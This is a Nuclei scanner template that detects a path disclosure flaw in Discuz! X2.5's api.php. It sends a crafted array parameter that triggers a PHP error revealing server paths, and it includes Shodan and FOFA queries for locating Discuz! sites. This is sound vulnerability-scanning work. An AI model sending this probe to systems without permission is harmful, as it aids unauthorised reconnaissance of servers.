44 lines
1.1 KiB
YAML
44 lines
1.1 KiB
YAML
id: discuz-api-pathinfo
|
|
|
|
info:
|
|
name: Discuz! X2.5 - Path Disclosure
|
|
author: ritikchaddha
|
|
severity: low
|
|
description: Discuz! X2.5 api.php path disclosure vulnerability
|
|
reference:
|
|
- https://crx.xmspace.net/discuz_x25_api_php.html
|
|
- http://www.1314study.com/t/87417.html
|
|
classification:
|
|
cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: comsenz
|
|
product: discuz\\!
|
|
shodan-query: title:"Discuz!"
|
|
fofa-query: title="Discuz!"
|
|
tags: discuz,info,disclosure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/api.php?mod[]=auto'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '.php</b> on line'
|
|
- 'function.array'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100e28ef0aa5df50a54c21c7a77699d5cf7657d672c7d4af505e769d903b3320abe0220457553e471bdab44acdb0c4a2d3488c6e80556ae93cdb719ccc7a02b6db957cd:922c64590222798bb761d5b6d8e72950 |